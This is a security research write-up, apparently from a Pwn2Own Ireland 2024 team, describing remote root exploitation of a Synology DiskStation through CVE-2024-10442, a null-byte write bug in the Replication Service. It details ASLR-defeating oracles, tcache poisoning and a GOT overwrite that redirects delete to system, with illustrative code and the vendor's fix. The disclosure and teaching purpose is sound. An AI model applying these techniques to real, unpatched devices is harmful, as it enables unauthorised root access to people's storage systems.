Exploiting the Synology DiskStation with Null-byte Writes

In October, we attended Pwn2Own Ireland 2024 and successfully exploited the Synology DiskStation DS1823xs+ to obtain remote code execution as root. The issue has since been fixed and is tracked as CVE-2024-10442.

The DiskStation is a popular line of NAS (network-attached storage) products by Synology. It has been successfully exploited a few times at Pwn2Own events in the past, though it remained untouched in the prior year’s event (Pwn2Own Toronto 2023). Then Ireland 2024 saw three successful entries, all using unique bugs.

This post will detail our experience researching the Synology DiskStation and writing an exploit against it for the event.

Prepping to throw an exploit at the Synology DiskStation, Pwn2Own Ireland 2024

Reviewing Synology Packages

As mentioned, the past year or two of Pwn2Own had garnered no entries against the Synology DiskStation. In 2024, ZDI opted to place a few non-default, but first-party packages authored by Synology in-scope for the competition:

For the Synology DiskStation target, the following packages will be installed and are in scope for contest:

MailPlus
Drive
Virtual Machine Manager
Snapshot Replication
Surveillance Station
Photos

“Packages” are optional add-on applications and services that can be easily installed on the device via Synology’s Package Center in DiskStation Manager.

For us, this meant more attack surface, and as this was the first year these packages were in-scope, we figured there was good opportunity to find some relatively shallow vulnerabilities, as these packages likely hadn’t seen as much security-oriented review. This turned out to be very true.

The first package we looked at was Virtual Machine Manager, which we installed directly from the built-in Package Center on a physical DiskStation.

We could then enumerate any new network listeners with netstat via an SSH shell we had on our test device. This revealed a handful of localhost-only services, save for a single service bound to all interfaces, running the following command (as root):

/var/packages/ReplicationService/target/sbin/synobtrfsreplicad --port 5566

This listener was actually part of Replication Service, a separate package which was a dependency of Virtual Machine Manager (and is also a dependency of Snapshot Replication). Our interest was piqued given the high privilege-level and ease of communication with this service.

The next step was to examine the binary. Since we had installed the service on a real device, we were able to pull the files via SSH.

Alternatively, software downloads are available directly from Synology for both DSM (the core operating system) and packages. An extraction tool can then be used to parse the custom Synology archives and spit out the contents of packages, firmware images, or updates. Note that this particular tool is an FFI wrapper around native first-party Synology shared libraries, which can be pulled off a real device, or extracted from a DSM archive with a separate tool.

Finding the Bug

With the relevant binaries in hand, we can start to look at the code for this TCP service listening on port 5566. The main binary synobtrfsreplicad is just a driver shim to invoke functionality in libsynobtrfsreplicacore.so.7, which starts the TCP listener.

The service is a minimal Linux-based forking server, with the main process continually calling accept() and forking off a child process to handle each new remote client. In turn, the child process runs a basic command loop to parse incoming messages sent to the service.

Each command has a simple binary format, with an opcode optionally followed by a variably-sized data payload:

unsigned cmd // command opcode
unsigned seq // sequence number
unsigned len // payload length in bytes
char data[len] // payload, present only if len > 0
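As a minimal sketch, a client could serialize one such message as shown here. The little-endian byte order is an assumption, and the opcode value 1 is a placeholder, since the real opcode numbers are not listed in this post.

```python
import struct

HEADER_FMT = "<III"  # cmd, seq, len as 32-bit unsigned ints (little-endian assumed)
HEADER_SIZE = struct.calcsize(HEADER_FMT)  # 12 bytes

def pack_cmd(cmd: int, seq: int, data: bytes = b"") -> bytes:
    """Serialize a command: 12-byte header followed by the payload."""
    return struct.pack(HEADER_FMT, cmd, seq, len(data)) + data

def unpack_header(raw: bytes) -> tuple:
    """Decode (cmd, seq, len) from the first 12 bytes of a message."""
    return struct.unpack(HEADER_FMT, raw[:HEADER_SIZE])

msg = pack_cmd(1, 0, b"hello")  # opcode 1 is a placeholder value
```

A well-behaved client always sets len to the real payload size; the interesting cases come from sending a header whose len does not match.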

Two globals are defined to facilitate parsing these command messages. One is for the command itself, and the other is a ring-buffer-esque structure to hold up to 3 variably-sized command payloads.

struct
{
    unsigned char sector; // ring buffer index
    char bufs[3][65536]; // ring buffer of 3 payloads
    unsigned buf_lens[3]; // populated lengths of 3 payloads
} g_recvbuf;

struct
{
    ReplicaCmdHeader header; // opcode, seq, len
    char *data; // will point into one of the 3 g_recvbuf bufs
} g_cmd;

The command loop for reading messages looks something like this:

void runCmdLoop() {
    while (1) {
        // point the command at the current ring-buffer slot
        g_cmd.data = g_recvbuf.bufs[g_recvbuf.sector];
        int err = recvCmd(&g_cmd);
        if (err)
            break; // bail out of the loop on error
        // null-terminate the payload using the attacker-supplied length
        g_cmd.data[g_cmd.header.len] = 0;
        // ... handle cmd ...
    }
}

// function to read both the header and payload of a message
int recvCmd(ReplicaCmd* cmd) {
    int err = raw_tcp_recv(&cmd->header, 12);
    if (err)
        return err;
    if (cmd->header.len > 0x10000)
        return err; // err is still 0 here, so the caller sees success
    // read actual payload data
    err = raw_tcp_recv(cmd->data, cmd->header.len);
    // ...
}

If the attacker-supplied length is too large, recvCmd bails out without reading any payload. However, its return value is zero, indicating no error, a bit odd considering the header length was invalid… Back in the caller, which is unaware of any error, things proceed normally, and the command payload is null terminated, using the arbitrarily large header length.

This bug is trivial enough that for our initial POC, we can use netcat to send a message consisting solely of A’s (at least 12), in classic pwnable fashion.
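To see why a run of A’s is enough, the following sketch decodes such a header the way the service would (little-endian is assumed) and works out where the null byte lands relative to the 64 KiB payload buffer.

```python
import struct

MAX_PAYLOAD = 0x10000

header = b"A" * 12
cmd, seq, length = struct.unpack("<III", header)  # little-endian assumed

# Every field decodes to 0x41414141, so the length check in recvCmd trips,
# yet the function still reports success to its caller.
oversized = length > MAX_PAYLOAD

# runCmdLoop then executes g_cmd.data[length] = 0, a write this many bytes
# past the end of the payload buffer.
bytes_past_buffer_end = length - MAX_PAYLOAD
```

The write lands roughly 1 GiB past the buffer, which is very likely unmapped memory, so the child handling this connection crashes.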

Unless you’re attached to the service using gdb, there’s no on-device indication that anything has gone wrong. The fault doesn’t seem to be logged to syslog or any other DSM logging facilities, and due to the nature of a forking server, there is no immediate loss of functionality.

The primitive afforded by this vulnerability will allow us to make repeated null byte writes into arbitrary offsets of the shared library’s BSS (the section holding its zero-initialized globals). Very CTF-like. Although the vulnerability is rather simple, the exploitation of it will be a bit more interesting.

Regardless, as all mitigations were enabled, we first had to somehow turn this into an info leak.

Forking Server

Before we move on, recall that we’re dealing with a forking server, which can be very useful for breaking ASLR. Each child process that is forked will have the same exact address space as the parent, and crashing them has no consequences: we simply reconnect to the service and get a clean slate, in the form of a new child process. A bit like a time loop, each connection is an opportunity to glean new information about the address space in a cumulative manner.

At a high level, each iteration has the following structure:

Guess something (e.g. an address)
Have the binary use the guessed value such that it will behave differently if it’s correct or not (e.g. a wrong address will crash)
Observe the binary’s behavior to determine if the value was correct
If correct, we have found the right value. Otherwise, repeat with the next guess

We’ll see how this can be applied to this specific binary as we continue.
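The loop described above can be sketched generically. Everything here is illustrative: brute_force and fake_probe are hypothetical names, and fake_probe simulates the target instead of opening a real connection.

```python
from typing import Callable, Iterable, Optional, TypeVar

T = TypeVar("T")

def brute_force(candidates: Iterable[T], probe: Callable[[T], bool]) -> Optional[T]:
    """Return the first candidate for which probe() reports success.

    probe() stands in for "open a fresh connection, make the child use the
    guess, and report whether the child survived".
    """
    for guess in candidates:
        if probe(guess):
            return guess
    return None

# Simulated target: the secret stays fixed across "forks", just as the
# address space does for every child of the same parent.
SECRET = 0x7000
attempts = []

def fake_probe(guess: int) -> bool:
    attempts.append(guess)      # each call models one new connection
    return guess == SECRET      # a wrong guess models a crashed child

found = brute_force(range(0, 0x10000, 0x1000), fake_probe)
```

Because a wrong guess only costs one child process, the number of attempts is bounded by the size of the candidate set and nothing else.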

Functionality Overview

Since the bug in question occurs during input parsing, we hadn’t yet explored much of the program’s functionality, which we’ll need to leverage in constructing an exploit later on.

After reading the command from the network, the command loop has a switch-case over the supplied opcode. Opcodes that require input parse them from the variable-length command payload. We looked through all the available opcodes to get a rough idea of their functions:

CMD_DSM_VER : no inputs
- returns DSM version numbers
CMD_SSL : initializes SSL for the connection
CMD_TEST_CONNECT
CMD_NOP
CMD_VERSION : input integer
- sets the “version” of the connection for compatibility differences
CMD_TOKEN : input string “token” which must exist as a key in a JSON file on disk
- performs initialization and sets the global std::string g_token
CMD_NAME : input string “name”
- can potentially perform btrfs-related operations, and/or use g_token to modify the JSON file
CMD_SEND : input raw data
- proxies input to a file descriptor, seemingly set up elsewhere as a pipe to a btrfs command
CMD_UPDATE
CMD_STOP : input token string
- removes token from JSON
CMD_COUNT
CMD_CLR_BKP
CMD_SYNCSIZE
CMD_END

It soon became clear that many of these code paths hinged on providing a valid “token,” which was supposed to already exist in a JSON file at /usr/syno/etc/synobtrfsreplica/btrfs_snap_replica_recv_token. The JSON is used as a simple key-value store of attributes, where the tokens are the keys:

{
    "<token>": {"<attribute>":value, ... other attributes ...},
    ... other tokens ...
}

Presumably, some external service hands out these tokens and writes to the file, but where this happened was unclear to us.

However, there is one code path that allows adding tokens to the JSON file, possibly in an unintended way. The CMD_NAME opcode uses the current g_token, and writes an attribute to the file, with two important nuances:

it does not check if g_token was ever initialized (i.e. with CMD_TOKEN)
if the token did not already exist as a key in the JSON object, setting the attribute adds it
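The second nuance is ordinary key-value store behavior. The sketch below models it with a plain dictionary; set_attribute and token_exists are hypothetical helpers, not functions from the Synology binary.

```python
import json

def set_attribute(store: dict, token: str, attr: str, value) -> None:
    """Set an attribute for a token, creating the token entry if it is missing."""
    store.setdefault(token, {})[attr] = value

def token_exists(store: dict, token: str) -> bool:
    """Model of the lookup performed when a token is validated."""
    return token in store

store = json.loads('{"legit-token": {"attr": 1}}')
before = token_exists(store, "never-issued")
set_attribute(store, "never-issued", "name", "x")  # no check that the token was issued
after = token_exists(store, "never-issued")
```

Once the entry exists, a later lookup cannot tell it apart from a token that was handed out legitimately.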

Normally, the uninitialized g_token will just be an empty string, but with memory corruption in play, all bets are off, and we’ll see how this proves useful later on.

ASLR Oracle #1: Freeing a Fake Heap Chunk

Our primitive is a null byte write, where we supply an arbitrary offset into a command payload buffer. The offset is unsigned, so we can only write nulls to memory following the payload buffer.
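As a small sketch of how the primitive is aimed, the helpers below compute the header length needed to zero a given byte, and the pair of lengths needed to zero the two least significant bytes of a pointer-sized field (which sit at the lowest addresses on a little-endian machine). The layout offsets are hypothetical, not taken from the real library.

```python
MAX_PAYLOAD = 0x10000

def len_for_null_write(buf_off: int, target_off: int) -> int:
    """header.len value that makes data[len] = 0 hit target_off.

    Both offsets are relative to the library base. Only lengths above
    MAX_PAYLOAD take the buggy path, and the field is a 32-bit unsigned int.
    """
    length = target_off - buf_off
    if not MAX_PAYLOAD < length <= 0xFFFFFFFF:
        raise ValueError("target is not reachable through the bug")
    return length

def lens_for_low_bytes(buf_off: int, ptr_off: int, count: int = 2) -> list:
    """Lengths that zero the `count` least significant bytes of a pointer."""
    return [len_for_null_write(buf_off, ptr_off + i) for i in range(count)]

# Hypothetical layout: payload buffer at +0x20040, a pointer field at +0x30140.
lens = lens_for_low_bytes(0x20040, 0x30140)
```

Each length costs one message, so zeroing two bytes means triggering the bug twice.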

This raises the question of what resides after the payload buffer, which will be one of the three 0x10000-sized buffers in the g_recvbuf global in the shared library’s BSS. There aren’t many globals except for a handful of std::string instances, which have the following structure:

struct std::string {
    char* ptr; // for short strings, points into inline_buffer
    unsigned long length;
    char inline_buffer[16];
};

The default constructor sets the length to 0, and points the char* at the inline buffer. In other words, we’ll have a bunch of std::string instances in the BSS with pointers set to their own BSS address, plus the offset 16.

Now, consider if we use our null write to zero out the two lowest bytes of one of these pointers. The payload buffer that precedes it is 0x10000 bytes, which is large enough to guarantee that the partially-nulled BSS pointer points somewhere within this buffer, although we don’t know the exact offset.

Since ASLR has page granularity (12 bits), there will be 4 bits (one nibble) of entropy in this offset (i.e. it can be 0, 0x1000, 0x2000, … 0xf000).
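The arithmetic can be checked with a worked example. The offsets below are invented for illustration (the real layout differs), and fake_chunk_offset is a hypothetical helper; the point is only that a page-aligned base leaves exactly 16 possible results.

```python
BUF_SIZE = 0x10000

# Hypothetical offsets from the library base (not taken from the real binary).
BUF_OFF = 0x20040      # start of the payload buffer
STR_OFF = 0x30140      # a std::string object located after the buffer
INLINE_OFF = 16        # inline_buffer follows ptr (8 bytes) and length (8 bytes)

def fake_chunk_offset(lib_base: int) -> int:
    """Offset inside the payload buffer that the pointer refers to after
    its two low bytes have been zeroed."""
    ptr = lib_base + STR_OFF + INLINE_OFF   # value set by the default constructor
    corrupted = ptr & ~0xFFFF               # two low bytes nulled
    return corrupted - (lib_base + BUF_OFF)

# The base is page-aligned, so only bits 12..15 of it affect the result.
bases = [0x7F0000000000 + n * 0x1000 for n in range(16)]
offsets = sorted(fake_chunk_offset(b) for b in bases)
```

With this made-up layout the candidates come out as 0xfc0 plus a multiple of 0x1000 instead of exact multiples of 0x1000; either way there are 16 of them, one page apart, all inside the buffer.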

One of the global strings we can corrupt is _gSnapRecvPath, which can be re-assigned as one of the operations performed by the CMD_NAME command.

When re-assigning a std::string, if the char* is not pointing at the inline buffer, delete will be called on the old (now corrupted) value before assigning the new one. This lets us call free on a fake chunk within the payload buffer. We naturally control the contents of this buffer with our command payloads.

When free is invoked, if the fake chunk has a small-enough size, it will be placed into the glibc tcache. Alternatively, if the size is invalid (e.g. zero), free will call abort, crashing the process. This creates our first oracle, which we can combine with the forking-server behavior to determine which of the 16 possible offsets (0, 0x1000, … 0xf000) the fake chunk resides at.

For each of the 16 possible offsets:

Populate the payload buffer with padding up to the guessed offset, followed by the fake chunk’s metadata (which is just a fake size value)
Trigger the bug twice to null out the two low bytes of the char* for _gSnapRecvPath
Use CMD_NAME to free the corrupted char*, which may or may not be pointing at the fake chunk placed at the guessed offset
- if the socket remains connected and a response is sent, the guessed offset was correct
- if the socket is closed (i.e. abort was called), the guess was incorrect; try again with the next offset

We have now resolved one nibble of ASLR entropy and can reliably free a fake chunk in the payload buffer, which will be placed into the tcache.
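A minimal sketch of the payload used in each attempt is shown here. It follows the description literally (padding, then a fake size value); the chunk size of 0x40 and the helper name are assumptions, and the exact placement of the size field relative to the freed pointer is glossed over.

```python
import struct

def fake_chunk_payload(offset: int, chunk_size: int = 0x40) -> bytes:
    """Zero padding up to `offset`, then a fake malloc size field.

    The low bit (PREV_INUSE) is set, which is assumed to be harmless here.
    """
    if offset < 0 or offset + 8 > 0x10000:
        raise ValueError("size field must fit inside the payload buffer")
    return b"\x00" * offset + struct.pack("<Q", chunk_size | 1)

# One payload per candidate offset; only one of them lines up with the
# corrupted pointer, every other guess leaves a zero size there.
candidates = [n * 0x1000 for n in range(16)]
payloads = {off: fake_chunk_payload(off) for off in candidates}
```

Padding with zeros matters: a wrong guess makes free see a size of zero, which is exactly the invalid case that aborts the child and signals a miss.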

ASLR Oracle #2: Leaking Tokens

The tcache is a singly-linked list of free chunks, and each free chunk has a next pointer. Due to some hardening attempts in glibc, the next pointer is populated like so:

chunk->next = (&chunk->next >> 12) ^ next

In our case, the tcache list will be empty beforehand (next = 0), so the value written will be &chunk->next >> 12. In other words, we’ve placed a shifted BSS pointer into the payload buffer. We’ll now want to figure out some way to leak this value.
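The mangling formula is easy to verify in isolation. In this sketch, protect_ptr and reveal_ptr mirror the formula above, and the slot address is a made-up example value.

```python
def protect_ptr(slot_addr: int, next_ptr: int) -> int:
    """Pointer mangling as in the formula above: (slot address >> 12) XOR next."""
    return (slot_addr >> 12) ^ next_ptr

def reveal_ptr(slot_addr: int, stored: int) -> int:
    """Inverse of protect_ptr when the slot address is known."""
    return (slot_addr >> 12) ^ stored

# Hypothetical address of the fake chunk's next field inside the payload buffer.
slot = 0x7F1234567010
stored = protect_ptr(slot, 0)      # empty list: next is NULL
page_of_slot = stored << 12        # the leak pins the address down to its page
```

For a 47-bit user-space address the stored value fits in 5 bytes, which is why the leak later proceeds over 5 bytes.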

Once the fake chunk has been freed and the shifted BSS pointer written, we’ll null out the low 2 bytes of the char* of a second global std::string, g_token. This corruption will make g_token point at the same exact spot as _gSnapRecvPath. That is, at the shifted BSS pointer.

Recall our earlier functionality discussion of CMD_NAME, which can add an uninitialized g_token to the JSON file on disk. This is where that fact proves useful, since instead of the “uninitialized” g_token holding an empty string, it now points at the shifted BSS pointer. Triggering this code path, the JSON file now contains the value we want to leak.

Also note that before writing g_token out to disk, we can trigger the null byte write an additional time to truncate the shifted BSS pointer. In this way, we can write out each prefix of the pointer’s bytes. For example, if the shifted pointer is 0x766554433 (stored in memory as the little-endian bytes 33 44 55 66 07), we can write out each prefix in turn: 33, 3344, … up to the full 3344556607.
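The example value can be expanded into its prefixes with a few lines, assuming little-endian byte order:

```python
shifted = 0x766554433
raw = shifted.to_bytes(5, "little")    # bytes as laid out in memory
segments = [raw[:n].hex() for n in range(1, len(raw) + 1)]
```

Each entry of segments is one token that ends up as a key in the JSON file, written as hex here for readability.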

Once the JSON file contains the leak, we can use CMD_TOKEN as intended, which expects a single string parameter indicating the token to use. This token will be looked up in the JSON file, and different error codes will be returned based on whether it was found or not. This creates our second oracle, which we can use to implement a byte-by-byte brute force:

Loop b from 0 to 4 for each of the 5 bytes of the shifted BSS pointer:
1. Truncate the pointer to length b+1, then write the truncated segment into the JSON file
2. Loop over possible bytes 0 - 0xff:
  - send CMD_TOKEN with the guessed byte (prepended with the bytes already known from previous iterations, of length b)
  - the returned error code will indicate if the supplied byte was correct
  - if correct, we’ve found the byte at index b of the shifted pointer
  - otherwise, keep trying with the next possible byte
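The loop can be exercised against a simulated target. FakeTarget below is a stand-in for the real service: write_truncated models the truncate-then-CMD_NAME step and token_exists models the CMD_TOKEN error code. Both names are hypothetical.

```python
SECRET = (0x766554433).to_bytes(5, "little")   # example value from the text

class FakeTarget:
    """Simulates the two behaviours the brute force relies on."""
    def __init__(self):
        self.tokens = set()
        self.queries = 0

    def write_truncated(self, n: int) -> None:
        # models: truncate the pointer to n bytes, then store it as a JSON key
        self.tokens.add(SECRET[:n])

    def token_exists(self, token: bytes) -> bool:
        # models: CMD_TOKEN reporting "found" versus "not found"
        self.queries += 1
        return token in self.tokens

def leak_bytes(target: FakeTarget, length: int = 5) -> bytes:
    known = b""
    for b in range(length):
        target.write_truncated(b + 1)
        for guess in range(0x100):
            if target.token_exists(known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError(f"no match for byte {b}")
    return known

target = FakeTarget()
leaked = leak_bytes(target)
value = int.from_bytes(leaked, "little")
```

The cost is at most 256 queries per byte, so 1280 queries in the worst case for all 5 bytes, compared with the 2^40 guesses a blind search over the same value would need.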

Once this byte-by-byte brute force is complete, we’ll have leaked the shifted BSS pointer, which gives us the base address of the shared library. Since consecutive mmap mappings are typically placed adjacent to one another in virtual memory, this also gives us the addresses of the other shared libraries, most notably libc.
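Turning the leak into base addresses is simple arithmetic. The sketch below uses invented constants throughout; in practice the chunk offset would come from static analysis plus the nibble recovered earlier, and the distance to libc would be measured on a test device running the same firmware.

```python
PAGE = 0x1000

def library_base(leaked_shifted: int, chunk_page_off: int) -> int:
    """Library base from the leaked (address >> 12) value.

    chunk_page_off is the page-aligned offset of the fake chunk from the
    library base.
    """
    return (leaked_shifted << 12) - chunk_page_off

def sibling_base(lib_base: int, delta: int) -> int:
    """Base of another mapping that sits at a fixed distance from lib_base."""
    return lib_base + delta

# All constants below are made up for illustration.
base = library_base(0x7F1234567, 0x2F000)
libc = sibling_base(base, -0x400000)
```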

Hijacking Control Flow

Armed with a leak, we are ready to craft a final payload to hijack control flow.

We already have the ability to free a fake chunk in the payload buffer, and by sending additional commands, we can arbitrarily corrupt this free chunk. At this point, we can abuse the tcache linked list in the standard way:

Corrupt the fake chunk’s next pointer with an arbitrary address
Allocate something of the same size as the fake chunk
- malloc will return the fake chunk, then set the new head of the tcache list to the arbitrary address
Allocate the same size again to have malloc return the arbitrary address
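These steps can be traced with a toy model of a single tcache bin. This is a deliberately simplified sketch: it ignores glibc’s per-bin counters, alignment checks and every other integrity check, and both addresses are hypothetical.

```python
class ToyTcacheBin:
    """Single tcache bin with safe-linking, modelled as a linked list."""
    def __init__(self, memory: dict):
        self.memory = memory    # address -> 8-byte value stored there
        self.head = 0           # 0 plays the role of NULL

    def free(self, chunk: int) -> None:
        self.memory[chunk] = (chunk >> 12) ^ self.head   # mangled next pointer
        self.head = chunk

    def malloc(self) -> int:
        chunk = self.head
        # demangle whatever is stored in the chunk's next field
        self.head = (chunk >> 12) ^ self.memory.get(chunk, 0)
        return chunk

memory = {}
tbin = ToyTcacheBin(memory)

FAKE_CHUNK = 0x7F1234567010   # hypothetical address inside the payload buffer
TARGET = 0x7F1234599000       # hypothetical address the attacker wants returned

tbin.free(FAKE_CHUNK)
# The attacker overwrites the freed chunk's next field. The value must be
# mangled the same way, which is why the address leak comes first.
memory[FAKE_CHUNK] = (FAKE_CHUNK >> 12) ^ TARGET

first = tbin.malloc()
second = tbin.malloc()
```

The first allocation hands back the fake chunk and the second hands back the attacker-chosen address, so whatever the program writes into that second allocation lands at the target.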

We just have to find some code that matches this pattern of two consecutive allocations. Luckily, it turns out that the CMD_TOKEN handler fits this pattern, and after the two allocations are performed, a std::string temporarily containing our input parameter is destructed, invoking delete on a char* with our input.

This brings us to the following strategy:

Corrupt the fake tcache chunk’s next pointer to point near the shared library’s GOT entry for delete
Send a CMD_TOKEN command
The handler will allocate twice from the corrupted tcache, overwriting the GOT entry for delete with system
The subsequent destructor calls delete, which instead invokes system with the controlled input string

From here it’s game over. We can simply execute /bin/sh and redirect stdio to the client socket that’s already connected (avoiding the need for a connect-back).

The full exploit code for our submission has been made available here.

The Fix

The vulnerability was assigned CVE-2024-10442. Synology released a patch for Replication Service relatively quickly, on November 5th, 2024 (Pwn2Own Ireland took place on October 22nd); Synology’s advisory can be found here. ZDI’s advisory can be found here. The patch modified the recvCmd function to return an error instead of zero if the supplied header length is too large.

if (cmd->header.len > 0x10000)
    return 1; // instead of previous return 0

The caller then detects this error and bails instead of continuing to process the invalid command.
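The effect of the one-line change can be modelled as follows. This sketch considers only the length check (network errors are ignored), and the function names are hypothetical.

```python
MAX_PAYLOAD = 0x10000

def recv_cmd_status(length: int, patched: bool) -> int:
    """Return value of recvCmd for a header carrying the given len field."""
    if length > MAX_PAYLOAD:
        return 1 if patched else 0   # unpatched code returned err, still 0 here
    return 0

def oversized_len_reaches_null_write(length: int, patched: bool) -> bool:
    """True if an oversized len makes it to the data[len] = 0 step in the caller."""
    return length > MAX_PAYLOAD and recv_cmd_status(length, patched) == 0
```

With patched set to False an oversized length reaches the null-termination step; with patched set to True the caller sees the error first and bails.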

Conclusion

Although easy to find, this vulnerability was interesting to exploit, in that the null byte write was relatively weak as a primitive. It felt like the sort of bug you’d find in a CTF challenge, and the tcache manipulation and brute force oracles matched the CTF vibe as well.

On a more serious note, even though it’s in a non-default package, the presence of such a simple vulnerability in a remotely accessible service (running as root) is a bit concerning, especially considering that Synology is a fairly popular vendor of consumer- and business-oriented NAS devices, and it’s not uncommon for these devices to be exposed to the internet.
